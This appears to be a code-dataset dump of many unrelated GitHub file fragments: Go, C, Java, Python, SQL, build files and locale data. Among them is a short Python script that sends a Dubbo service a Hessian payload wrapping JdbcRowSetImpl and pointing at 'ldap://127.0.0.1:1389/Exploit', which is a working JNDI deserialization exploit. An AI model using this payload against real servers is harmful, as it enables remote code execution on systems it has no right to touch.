text stringlengths 2 99k | meta dict |
|---|---|
// Package printf implements a parser for fmt.Printf-style format
// strings.
//
// It parses verbs according to the following syntax:
// Numeric -> '0'-'9'
// Letter -> 'a'-'z' | 'A'-'Z'
// Index -> '[' Numeric+ ']'
// Star -> '*'
// Star -> Index '*'
//
// Precision -> Numeric+ | Star
// W... | {
"pile_set_name": "Github"
} |
ALTER TABLE db_version CHANGE COLUMN required_z2187_s1820_12269_11_mangos_gossip_menu_option required_z2192_s1825_12278_01_mangos_creature_template bit;
ALTER TABLE creature_template DROP COLUMN spell1, DROP COLUMN spell2, DROP COLUMN spell3, DROP COLUMN spell4;
| {
"pile_set_name": "Github"
} |
#
# Makefile for the Linux network (ethercard) device drivers.
#
obj-$(CONFIG_E1000) += e1000/
obj-$(CONFIG_IBM_EMAC) += ibm_emac/
obj-$(CONFIG_IXGB) += ixgb/
obj-$(CONFIG_CHELSIO_T1) += chelsio/
obj-$(CONFIG_CHELSIO_T3) += cxgb3/
obj-$(CONFIG_EHEA) += ehea/
obj-$(CONFIG_BONDING) += bonding/
obj-$(CONFIG_ATL1) += atl1... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<ui version="4.0">
<class>playlistItemText</class>
<widget class="QWidget" name="playlistItemText">
<property name="geometry">
<rect>
<x>0</x>
<y>0</y>
<width>192</width>
<height>175</height>
</rect>
</property>
<property name="windowTitle">
<strin... | {
"pile_set_name": "Github"
} |
package com.alley.openssl;
import android.content.Context;
import android.support.test.InstrumentationRegistry;
import android.support.test.runner.AndroidJUnit4;
import org.junit.Test;
import org.junit.runner.RunWith;
import static org.junit.Assert.*;
/**
* Instrumentation test, which will execute on an Android de... | {
"pile_set_name": "Github"
} |
/* Auto-generated config file atca_config.h */
#ifndef ATCA_CONFIG_H
#define ATCA_CONFIG_H
/* MPLAB Harmony Common Include */
#include "definitions.h"
<#assign pliblist = CAL_PLIB_LIST?word_list>
<#if pliblist?size != 0>
<#list pliblist as plib_id>
<#assign plib_info = plib_id?split("_")>
<#if plib_info?size == 1 || ... | {
"pile_set_name": "Github"
} |
#%Module
puts stderr "[module-info mode] [module-info name]"
| {
"pile_set_name": "Github"
} |
<%= p("blobstore.tls.cert.private_key") %>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?><manifest xmlns:android="http://schemas.android.com/apk/res/android" package="com.tangpj.nostatistic">
<application android:icon="@mipmap/ic_launcher" android:allowBackup="true" android:supportsRtl="true" android:theme="@style/AppTheme" android:label="@string/app_name" android:ro... | {
"pile_set_name": "Github"
} |
// Copyright 2017 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "components/arc/video_accelerator/protected_buffer_manager.h"
#include <utility>
#include "base/bind.h"
#include "base/bits.h"
#include "base/l... | {
"pile_set_name": "Github"
} |
import numpy as np
import tensorflow as tf
import tensorflow.keras.backend as K
import itertools
def face_normals(vertices, faces):
edges1 = tf.gather(vertices, faces[:, 1]) - tf.gather(vertices, faces[:, 0])
edges2 = tf.gather(vertices, faces[:, 2]) - tf.gather(vertices, faces[:, 0])
return tf.linalg.l2_... | {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!-- NewPage -->
<html lang="en">
<head>
<!-- Generated by javadoc (version 1.7.0_25) on Thu Jan 01 20:30:37 PST 2015 -->
<meta http-equiv="Content-Type" content="text/html" charset="UTF-8">
<title>XmlTextDeserializer... | {
"pile_set_name": "Github"
} |
# 3.0 编辑器、集成开发环境与其它工具
因为 Go 语言还是一门相对年轻的编程语言,所以不管是在集成开发环境(IDE)还是相关的插件方面,发展都不是很成熟。不过目前还是有一些 IDE 能够较好地支持 Go 的开发,有些开发工具甚至是跨平台的,你可以在 Linux、Mac OS X 或者 Windows 下工作。
你可以通过查阅 [编辑器和 IDE 扩展](http://go-lang.cat-v.org/text-editors/) 页面来获取 Go 开发工具的最新信息。
## 链接
- [目录](directory.md)
- 上一章:[Go 解释器](02.8.md)
- 下一节:[Go 开发环境的基本要求](03.... | {
"pile_set_name": "Github"
} |
#pragma once
#include <vector>
#include <string>
namespace kcov
{
/**
* Cache class for source code
*/
class ISourceFileCache
{
public:
virtual ~ISourceFileCache()
{
}
/**
* Get the source lines of a file
*
* @param filePath the file to lookup
*
* @return A reference to the source line... | {
"pile_set_name": "Github"
} |
// Copyright 2011 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
package main
import (
"go/ast"
"go/parser"
"strings"
"testing"
)
type testCase struct {
Name string
Fn func(*ast.File) bool
In string
Out string... | {
"pile_set_name": "Github"
} |
using Microsoft.Win32;
using System;
using System.IO;
using System.Security;
using System.Windows;
using UI.Infrastructure;
namespace UI.Dialogs
{
public partial class ServerDialog : Window
{
public string ServerAddress { get; private set; }
public string CertificatePath { get; private set; }
public S... | {
"pile_set_name": "Github"
} |
<?php
/**
* Enable the plugin to add additional XML nodes and attributes to entry MRSS
* @package infra
* @subpackage Plugins
*/
interface IKalturaMrssContributor extends IKalturaBase
{
/**
* @param BaseObject $object
* @param SimpleXMLElement $mrss
* @param kMrssParameters $mrssParams
* @return SimpleXMLE... | {
"pile_set_name": "Github"
} |
// CodeContracts
//
// Copyright (c) Microsoft Corporation
//
// All rights reserved.
//
// MIT License
//
// Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including wit... | {
"pile_set_name": "Github"
} |
// Copyright (c) 2012 Mark Cavage. All rights reserved.
var fs = require('fs');
var pino = require('pino');
var restify = require('restify');
var todo = require('../lib');
///--- Globals
var CLIENT;
var DIR = '/tmp/.todo_unit_test';
var SERVER;
var SOCK = '/tmp/.todo_sock';
///--- Tests
exports.setup = function(... | {
"pile_set_name": "Github"
} |
# Set up gems listed in the Gemfile.
ENV['BUNDLE_GEMFILE'] ||= File.expand_path('../../Gemfile', __FILE__)
require 'bundler/setup' if File.exist?(ENV['BUNDLE_GEMFILE'])
| {
"pile_set_name": "Github"
} |
package com.apeng.ffmpegandroiddemo;
import android.app.ProgressDialog;
import android.content.Context;
public class CustomProgressDialog extends ProgressDialog {
public CustomProgressDialog(Context context) {
super(context);
setMessage("处理中...");
setMax(100);
setProgressStyle(Prog... | {
"pile_set_name": "Github"
} |
# Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
Test cases for Ltwisted.mail.pop3} module.
"""
import StringIO
import hmac
import base64
import itertools
from zope.interface import implements
from twisted.internet import defer
from twisted.trial import unittest, util
from twis... | {
"pile_set_name": "Github"
} |
/*
* Copyright (c) 2016, Facebook, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* LICENSE file in the root directory of this source tree. An additional grant
* of patent rights can be found in the PATENTS file in the same directory.
*/
#ifndef FATAL_... | {
"pile_set_name": "Github"
} |
# pylint: disable=no-self-use,invalid-name
from __future__ import division
from __future__ import absolute_import
from nltk import Tree
from allennlp.data.dataset_readers.dataset_utils import Ontonotes
from allennlp.common.testing import AllenNlpTestCase
class TestOntonotes(AllenNlpTestCase):
def test_datase... | {
"pile_set_name": "Github"
} |
To build RAMBOOT, replace this section the main Makefile
pcm030_config \
pcm030_RAMBOOT_config \
pcm030_LOWBOOT_config: unconfig
@ >include/config.h
@[ -z "$(findstring LOWBOOT_,$@)" ] || \
{ echo "CONFIG_SYS_TEXT_BASE = 0xFF000000" >board/phytec/pcm030/config.tmp ; \
echo "... with LOWBOOT configuration" ; \
... | {
"pile_set_name": "Github"
} |
var ecc = require("./index.js");
var key1 = new ecc.ECKey(ecc.ECCurves.secp160r1);
var key2 = new ecc.ECKey(ecc.ECCurves.secp160r1);
console.log(key1.deriveSharedSecret(key2));
var key3 = new ecc.ECKey(ecc.ECCurves.secp160r1,key1.PrivateKey);
var key4 = new ecc.ECKey(ecc.ECCurves.secp160r1,key2.PublicKey,true);
console... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<!--
For more information on how to configure your ASP.NET application, please visit
https://go.microsoft.com/fwlink/?LinkId=301879
-->
<configuration>
<connectionStrings>
<add name="WfDBConnectionString" connectionString="Data Source=127.0.0.1;Initial Catalog=WfDBCom... | {
"pile_set_name": "Github"
} |
.\" Copyright (c) 2011 Joseph Koshy. All rights reserved.
.\"
.\" Redistribution and use in source and binary forms, with or without
.\" modification, are permitted provided that the following conditions
.\" are met:
.\" 1. Redistributions of source code must retain the above copyright
.\" notice, this list of cond... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx... | {
"pile_set_name": "Github"
} |
namespace MyTested.AspNetCore.Mvc
{
using System.Collections;
using System.Collections.Generic;
using Utilities.Validators;
/// <summary>
/// Class used for specifying additional assertions for the action attributes.
/// </summary>
public class ActionAttributes : IEnumerable<object>
{
... | {
"pile_set_name": "Github"
} |
<mods xmlns="http://www.loc.gov/mods/v3" xmlns:exslt="http://exslt.org/common" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.loc.gov/mods/v3 http://www.loc.gov/standards/mods/v3/mods-3-3.xsd" version="3.3" ID="P0b002ee18a8bde63">
<name ty... | {
"pile_set_name": "Github"
} |
{
"info" : {
"version" : 1,
"author" : "xcode"
}
} | {
"pile_set_name": "Github"
} |
package checks.security;
import java.net.HttpCookie;
import java.util.Date;
import javax.servlet.http.Cookie;
import javax.servlet.http.HttpServletResponse;
import javax.ws.rs.core.NewCookie;
import org.apache.shiro.web.servlet.SimpleCookie;
import org.springframework.security.web.savedrequest.SavedCookie;
class Cook... | {
"pile_set_name": "Github"
} |
// Copyright 2013 The Prometheus Authors
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to... | {
"pile_set_name": "Github"
} |
Feature: Facility admin device management
Facility admins with device permissions need to see the *Device* dashboard to be able to manage resources
Background:
Given I am signed into Kolibri as a facility admin user with device permissions for content import
Scenario: View all the options for managing conte... | {
"pile_set_name": "Github"
} |
<!-- Do not edit this file. It is automatically generated by API Documenter. -->
[Home](./index.md) > [sip.js](./sip.js.md)
## sip.js package
A SessionDescriptionHandler for web browsers.
## Classes
| Class | Description |
| --- | --- |
| [SessionDescriptionHandler](./sip.js.sessiondescriptionhan... | {
"pile_set_name": "Github"
} |
<?xml version='1.0' encoding='utf-8'?>
<section xmlns="https://code.dccouncil.us/schemas/dc-library" xmlns:codified="https://code.dccouncil.us/schemas/codified" xmlns:codify="https://code.dccouncil.us/schemas/codify" xmlns:xi="http://www.w3.org/2001/XInclude" containing-doc="D.C. Code">
<num>9-411.02</num>
<heading... | {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Oct 15 2018 10:31:50).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2015 by Steve Nygard.
//
#import <Foundation/NSMutableURLRequest.h>
@interface NSMutableURLRequest (GKAdditions)
+ (int)hashForPlayerID:(id)arg1;
+ (id)_gkHTTP... | {
"pile_set_name": "Github"
} |
/*
* ak4613.c -- Asahi Kasei ALSA Soc Audio driver
*
* Copyright (C) 2015 Renesas Electronics Corporation
* Kuninori Morimoto <kuninori.morimoto.gx@renesas.com>
*
* Based on ak4642.c by Kuninori Morimoto
* Based on wm8731.c by Richard Purdie
* Based on ak4535.c by Richard Purdie
* Based on wm8753.c by Liam G... | {
"pile_set_name": "Github"
} |
47
54
54
48
40
46
64
50
37
64
52
46
67
77
68
46
47
63
75
54
58
49
54
47
75
51
58
44
39
58
57
47
47
61
48
76
55
43
49
47
38
54
49
43
44
56
35
53
60
67
61
39
24
60
51
41
70
61
40
61
45
42
50
39
29
52
58
47
48
65
42
60
54
54
63
39
34
59
73
43
67
62
47
51
56
53
54
48
55
54
58
43
59
53
61
58
53
55
58
41
38
64
63
54
64
42
47... | {
"pile_set_name": "Github"
} |
/*
* Copyright (C) 2015 Apple Inc. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions a... | {
"pile_set_name": "Github"
} |
import {GraphQLInt, GraphQLList, GraphQLNonNull, GraphQLObjectType} from 'graphql'
import {GQLContext} from '../../graphql'
import DomainCountPayload from './DomainCountPayload'
import authCount from '../queries/helpers/authCount'
import authCountByDomain from '../queries/helpers/authCountByDomain'
const LoginsPayload... | {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Pla... | {
"pile_set_name": "Github"
} |
// Copyright John Maddock 2008.
// Use, modification and distribution are subject to the
// Boost Software License, Version 1.0. (See accompanying file
// LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
//
# include <pch.hpp>
#ifndef BOOST_MATH_TR1_SOURCE
# define BOOST_MATH_TR1_SOURCE
#... | {
"pile_set_name": "Github"
} |
package Paws::IoTSecureTunneling::TagResourceResponse;
use Moose;
has _request_id => (is => 'ro', isa => 'Str');
### main pod documentation begin ###
=head1 NAME
Paws::IoTSecureTunneling::TagResourceResponse
=head1 ATTRIBUTES
=head2 _request_id => Str
=cut
1; | {
"pile_set_name": "Github"
} |
from dubbo.codec.hessian2 import Decoder,new_object
from dubbo.client import DubboClient
import sys
client = DubboClient('127.0.0.1', int(sys.argv[1]))
JdbcRowSetImpl=new_object(
'com.sun.rowset.JdbcRowSetImpl',
dataSource="ldap://127.0.0.1:1389/Exploit",
strMatchColumns=["foo"]
)
JdbcRowSetIm... | {
"pile_set_name": "Github"
} |
import scala.quoted._
inline def f: Any = ${ fImpl }
private def fImpl(using qctx: QuoteContext) : Expr[Unit] = {
import qctx.tasty._
searchImplicit(('[A]).unseal.tpe) match {
case x: ImplicitSearchSuccess =>
'{}
case x: DivergingImplicit => '{}
error("DivergingImplicit\n" + x.explanation, ro... | {
"pile_set_name": "Github"
} |
#include <stdio.h>
#include <xtables.h>
#include <linux/netfilter/xt_helper.h>
enum {
O_HELPER = 0,
};
static void helper_help(void)
{
printf(
"helper match options:\n"
"[!] --helper string Match helper identified by string\n");
}
static const struct xt_option_entry helper_opts[] = {
{.name = "helper", .id... | {
"pile_set_name": "Github"
} |
################################################################################
#
# lzo
#
################################################################################
LZO_VERSION = 2.10
LZO_SITE = http://www.oberhumer.com/opensource/lzo/download
LZO_LICENSE = GPL-2.0+
LZO_LICENSE_FILES = COPYING
LZO_INSTALL_STAGI... | {
"pile_set_name": "Github"
} |
# $FreeBSD$
PORTNAME= kbounce
DISTVERSION= ${KDE_APPLICATIONS_VERSION}
CATEGORIES= games kde kde-applications
MAINTAINER= kde@FreeBSD.org
COMMENT= ${${PORTNAME:tu}_DESC}
USES= cmake compiler:c++11-lang gettext kde:5 qt:5 tar:xz
USE_KDE= auth codecs completion config configwidgets coreaddons crash \
dbusaddons ecm... | {
"pile_set_name": "Github"
} |
(function(a) {
a.jgrid = a.jgrid || {};
a.extend(a.jgrid,{
defaults:
{
recordtext: "regels {0} - {1} van {2}",
emptyrecords: "Geen data gevonden.",
loadtext: "laden...",
pgtext: "pagina {0} van {1}"
},
search:
{
... | {
"pile_set_name": "Github"
} |
//
// Generated by class-dump 3.5 (64 bit) (Debug version compiled Jun 9 2015 22:53:21).
//
// class-dump is Copyright (C) 1997-1998, 2000-2001, 2004-2014 by Steve Nygard.
//
#import <objc/NSObject.h>
@interface TVolumeRestoreHelper : NSObject
{
_Bool _eraseInProgress;
_Bool _eraseSuccessful;
}
+ (i... | {
"pile_set_name": "Github"
} |
class Logging {
public static enableDebug = false;
public static disableWarnings = false;
public static disableErrors = false;
private static TAG = "ApplicationInsights:";
public static info(message?: any, ...optionalParams: any[]) {
if(Logging.enableDebug) {
console.info(Loggi... | {
"pile_set_name": "Github"
} |
{
"types": [
{
"type_attrs": [
{
"name": "title",
"value_type": "string"
},
{
"name": "url",
"value_type": "string"
},
{
... | {
"pile_set_name": "Github"
} |
#!/usr/bin/ruby
gets;$<.map{|e|n,d=e.split.map &:to_i;p 127*n+[-d,d-127][n%2]}
| {
"pile_set_name": "Github"
} |
using System;
using System.Collections.Generic;
using System.Linq;
using System.Net;
using System.Net.Sockets;
using System.Threading;
using System.Threading.Tasks;
using Microsoft.Extensions.Logging;
using NBitcoin;
using NBitcoin.Protocol;
using Stratis.Bitcoin.AsyncWork;
using Stratis.Bitcoin.EventBus.CoreEvents;
u... | {
"pile_set_name": "Github"
} |
var createPadding = require('./_createPadding'),
stringSize = require('./_stringSize'),
toInteger = require('./toInteger'),
toString = require('./toString');
/* Built-in method references for those with the same name as other `lodash` methods. */
var nativeCeil = Math.ceil,
nativeFloor = Math.floor;
/... | {
"pile_set_name": "Github"
} |
<?xml version='1.0'?>
<gl_extension name="GL_GREMEDY_frame_terminator" reg_no="345">
<functions>
<function name="glFrameTerminatorGREMEDY" return="void"/>
</functions>
</gl_extension>
| {
"pile_set_name": "Github"
} |
/*
Copyright (C) 2010-2017 Kristian Duske
This file is part of TrenchBroom.
TrenchBroom is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later versio... | {
"pile_set_name": "Github"
} |
package org.intermine.web.search;
/*
* Copyright (C) 2002-2020 FlyMine
*
* This code may be freely distributed and modified under the
* terms of the GNU Lesser General Public Licence. This should
* be distributed with the code. See the LICENSE file for more
* information or http://www.gnu.org/copyleft/lesser.h... | {
"pile_set_name": "Github"
} |
import { Macie2ClientResolvedConfig, ServiceInputTypes, ServiceOutputTypes } from "../Macie2Client";
import { GetMemberRequest, GetMemberResponse } from "../models/models_0";
import {
deserializeAws_restJson1GetMemberCommand,
serializeAws_restJson1GetMemberCommand,
} from "../protocols/Aws_restJson1";
import { getS... | {
"pile_set_name": "Github"
} |
# SPDX-License-Identifier: GPL-2.0+
#
# (C) Copyright 2017
# Mario Six, Guntermann & Drunck GmbH, mario.six@gdsys.cc
#
obj-$(CONFIG_AXI) += axi-uclass.o
obj-$(CONFIG_IHS_AXI) += ihs_axi.o
obj-$(CONFIG_SANDBOX) += axi-emul-uclass.o
obj-$(CONFIG_SANDBOX) += sandbox_store.o
obj-$(CONFIG_AXI_SANDBOX) += axi_sandbox.o
| {
"pile_set_name": "Github"
} |
/**
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you m... | {
"pile_set_name": "Github"
} |
/* ====================================================================
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for Additional information regarding copyright ownership.
The ASF licenses this file to Y... | {
"pile_set_name": "Github"
} |
05e61ef0e96d6442ea5a19363b1694b9eaf9bbd1
| {
"pile_set_name": "Github"
} |
var convert = require('./convert'),
func = convert('isBuffer', require('../isBuffer'), require('./_falseOptions'));
func.placeholder = require('./placeholder');
module.exports = func;
| {
"pile_set_name": "Github"
} |
/*=============================================================================
Copyright (c) 2012 Paul Fultz II
partial.h
Distributed under the Boost Software License, Version 1.0. (See accompanying
file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
==================================... | {
"pile_set_name": "Github"
} |
{
"parent": "refinedstorage:block/cube_north_cutout",
"textures": {
"particle": "refinedstorage:block/crafting_monitor/right",
"east": "refinedstorage:block/crafting_monitor/right",
"south": "refinedstorage:block/crafting_monitor/back",
"west": "refinedstorage:block/crafting_monitor/left",
"up":... | {
"pile_set_name": "Github"
} |
#ifndef BOOST_THREAD_CONDITION_VARIABLE_WIN32_HPP
#define BOOST_THREAD_CONDITION_VARIABLE_WIN32_HPP
// Distributed under the Boost Software License, Version 1.0. (See
// accompanying file LICENSE_1_0.txt or copy at
// http://www.boost.org/LICENSE_1_0.txt)
// (C) Copyright 2007-8 Anthony Williams
// (C) Copyright ... | {
"pile_set_name": "Github"
} |
//
// AxcPlayerBottomMask.h
// AxcUIKit
//
// Created by Axc_5324 on 17/7/19.
// Copyright © 2017年 Axc_5324. All rights reserved.
//
#import <UIKit/UIKit.h>
#import "AxcPlayerViewMask.h"
#import "AxcPlayerSlider.h"
#import "AxcPlayerControlButton.h"
@interface AxcPlayerBottomMask : AxcPlayerViewMask
@property (n... | {
"pile_set_name": "Github"
} |
-r requirements-test.txt
sphinx~=3.1.1
sphinx-rtd-theme
sphinx-autodoc-typehints~=1.11.0
ply
| {
"pile_set_name": "Github"
} |
; RUN: opt < %s -indvars -S | FileCheck %s
; PR10946: Vector IVs are not SCEVable.
; CHECK-NOT: phi
define void @test() nounwind {
allocas:
br i1 undef, label %cif_done, label %for_loop398
cif_done: ; preds = %allocas
ret void
for_loop398: ... | {
"pile_set_name": "Github"
} |
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
package nl.systemsgenetics.depict2.development;
import cern.colt.matrix.tdouble.DoubleMatrix1D;
import ch.unil.genescore.vegas.Davies;... | {
"pile_set_name": "Github"
} |
# Place
Contains information on the places (states, countries, continents, or historical regions) used to describe items in the Harvard Art Museums collections.
## Get Places
`GET /place` will get all places.
Include one or more of the following parameters to filter the items.
| Parameter | Value |
| :--------- | ... | {
"pile_set_name": "Github"
} |
// Copyright 2012 The Go Authors. All rights reserved.
// Use of this source code is governed by a BSD-style
// license that can be found in the LICENSE file.
// +build windows
// func servicemain(argc uint32, argv **uint16)
TEXT ·servicemain(SB),7,$0
MOVL CX, ·sArgc(SB)
MOVQ DX, ·sArgv(SB)
SUBQ $32, SP // stack... | {
"pile_set_name": "Github"
} |
/*
Copyright The Kubernetes Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, softw... | {
"pile_set_name": "Github"
} |
[
{"id": "org.sugarlabs.Tangram", "name": "Tangram", "version": 1, "directory": "activities/Tangram.activity", "icon": "activity/activity-icon.svg", "favorite": true, "activityId": null},
{"id": "org.sugarlabs.Vote", "name": "Vote", "version": 1, "directory": "activities/Vote.activity", "icon": "activity/activity-ico... | {
"pile_set_name": "Github"
} |
/*++
Copyright (c) 1993 Microsoft Corporation
Module Name:
diskdump.h
Abstract:
This file defines the necessary structures, defines, and functions for
the common SCSI boot port driver.
Author:
Mike Glass (Ported from Jeff Havens and Mike Glass loader development.)
Revision History:
--*/
#incl... | {
"pile_set_name": "Github"
} |
{{< core_form/element-template }}
{{$element}}
{{^element.frozen}}
<input type="hidden" name="{{element.nameraw}}" value="_qf__force_multiselect_submission">
<select class="custom-select {{#error}}is-invalid{{/error}}" name="{{element.name}}"
id="{{element.id}}"
{{#el... | {
"pile_set_name": "Github"
} |
# -*- coding: utf-8 -*-
"""
pygments.lexers.other
~~~~~~~~~~~~~~~~~~~~~
Just export lexer classes previously contained in this module.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
from pygments.lexers.sql import SqlLexer, MySqlLexe... | {
"pile_set_name": "Github"
} |
DENSITY
========
Superfast compression library
DENSITY is a free C99, open-source, BSD licensed compression library.
It is focused on high-speed compression, at the best ratio possible. **All three** of DENSITY's algorithms are currently at the **pareto frontier** of compression speed vs ratio (cf. [here](https://gi... | {
"pile_set_name": "Github"
} |
<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>
Stop (test_package+re.Stop)
</title>
<link rel="stylesheet" href="../../odoc.css">
<meta charset="utf-8">
<meta name="generator" content="odoc %%VERSION%%">
<meta name="viewport" content="width=device-width,initial-scale=1.0">
<... | {
"pile_set_name": "Github"
} |
<annotation>
<folder>widerface</folder>
<filename>55--Sports_Coach_Trainer_55_Sports_Coach_Trainer_sportcoaching_55_652.jpg</filename>
<source>
<database>wider face Database</database>
<annotation>PASCAL VOC2007</annotation>
<image>flickr</image>
<flickrid>-1</flickrid>
</source>
<owner>
<flickrid>yanyu</flickrid>
<nam... | {
"pile_set_name": "Github"
} |
{
"name": "foo",
"version": "0.0.1",
"description": "foo",
"scripts": {
"clean": "rm -rf ./node_modules/ ./bower_components/",
"test": "rm -rf ./test/dist; gulp prepare-test; mocha ./test/test.js",
"start": "webpack-dev-server ./js/entry.js ./dist/bundle.js --watch"
},
"keywords": [],
"author"... | {
"pile_set_name": "Github"
} |
from typing import Tuple, Union, List, Optional, TypeVar, Sequence
from pygame.color import Color
from pygame.surface import Surface
_ColorValue = Union[
Color, Tuple[int, int, int], List[int], int, Tuple[int, int, int, int]
]
class PixelArray:
surface: Surface
itemsize: int
ndim: int
shape: Tupl... | {
"pile_set_name": "Github"
} |
package sign
import (
"crypto/rsa"
"fmt"
"net/http"
"strings"
"time"
)
const (
// CookiePolicyName name of the policy cookie
CookiePolicyName = "CloudFront-Policy"
// CookieSignatureName name of the signature cookie
CookieSignatureName = "CloudFront-Signature"
// CookieKeyIDName name of the signing Key ID c... | {
"pile_set_name": "Github"
} |
//
// Responsive: Landscape phone to desktop/tablet
// --------------------------------------------------
@media (max-width: 767px) {
// Padding to set content in a bit
body {
padding-left: 20px;
padding-right: 20px;
}
// Negative indent the now static "fixed" navbar
.navbar-fixed-top,
.navbar-fi... | {
"pile_set_name": "Github"
} |
'Duplicate assignment': 'Duplicitní přiřazení'
Templates: Šablony
'Import theme': 'Importovat téma'
'Import succeeded!': null
'Import failed!': 'Neúspěšný import!'
'Edit template: $1': 'Upravit šablonu: $1'
'Set new name to': 'Nastavit nový název do'
'Rename file': 'Přejmenovat soubor'
'Caching templates in:': 'Caching... | {
"pile_set_name": "Github"
} |
package grpc
import (
"context"
"fmt"
"reflect"
"google.golang.org/grpc"
"google.golang.org/grpc/metadata"
"github.com/go-kit/kit/endpoint"
)
// Client wraps a gRPC connection and provides a method that implements
// endpoint.Endpoint.
type Client struct {
client *grpc.ClientConn
serviceName string
me... | {
"pile_set_name": "Github"
} |
package commands
import (
"github.com/bmizerany/assert"
"github.com/jingweno/gh/github"
"testing"
)
func TestParsePullRequestProject(t *testing.T) {
c := &github.Project{Host: "github.com", Owner: "jingweno", Name: "gh"}
s := "develop"
p, ref := parsePullRequestProject(c, s)
assert.Equal(t, "develop", ref)
a... | {
"pile_set_name": "Github"
} |
/**
* FlowChart
*/
import {
Diagram, NodeModel, Segments, ConnectorModel, TextStyleModel, DiagramContextMenu,
DiagramConstraints, ConnectorBridging, UndoRedo, DiagramBeforeMenuOpenEventArgs,
} from '../../src/diagram/index';
import { MenuEventArgs } from '@syncfusion/ej2-navigations';
import { createElement ... | {
"pile_set_name": "Github"
} |
<?php
/**
* PHPUnit
*
* Copyright (c) 2010-2013, Sebastian Bergmann <sb@sebastian-bergmann.de>.
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* * Redistributions of source code m... | {
"pile_set_name": "Github"
} |
## How to preload resources with JavaScript [Back](./qa.md)
### 1. A image resource loader class
```js
(function (root, factory) {
if (typeof define === 'function' && define.amd) {
/** AMD style */
define(factory);
} else if (typeof exports === 'object') {
/** Node, CommonJS style */
... | {
"pile_set_name": "Github"
} |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<!-- http://biesi.damowmow.com/object/017.html -->
<html lang="en">
<head>
<title><object>: Malformed image (with type attribute)</title>
</head>
<body>
<p>PASS</p>
</body>
</html>
| {
"pile_set_name": "Github"
} |
//
// Array.h
//
// Library: JSON
// Package: JSON
// Module: Array
//
// Definition of the Array class.
//
// Copyright (c) 2012, Applied Informatics Software Engineering GmbH.
// and Contributors.
//
// SPDX-License-Identifier: BSL-1.0
//
#ifndef JSON_Array_INCLUDED
#define JSON_Array_INCLUDED
#include "Poco/JSO... | {
"pile_set_name": "Github"
} |
goog.module('com.google.j2cl.transpiler.readable.multipleconstructors.MultipleConstructors$impl');
const j_l_Object = goog.require('java.lang.Object$impl');
const $Util = goog.require('nativebootstrap.Util$impl');
class MultipleConstructors extends j_l_Object {
/** @protected */
constructor() {
super();
/... | {
"pile_set_name": "Github"
} |
/*
Copyright (c) 2003-2017, CKSource - Frederico Knabben. All rights reserved.
For licensing, see LICENSE.md or http://ckeditor.com/license
*/
CKEDITOR.plugins.setLang( 'image2', 'hr', {
alt: 'Alternativni tekst',
btnUpload: 'Pošalji na server',
captioned: 'Titl slike',
captionPlaceholder: 'Titl',
infoTab: 'Info s... | {
"pile_set_name": "Github"
} |
/**
* For Node.js, simply re-export the core `util.deprecate` function.
*/
module.exports = require('util').deprecate;
| {
"pile_set_name": "Github"
} |
armada370-linux-3.x.txz SHA1 d9fd1fe0b43c94b9b97043cd0e0b6817df28fb2d
armada370-linux-3.x.txz SHA256 3467e639a7fa8a4dd3ed8b678b1b6b8e4367ff14b141c6e1195643b807db4b43
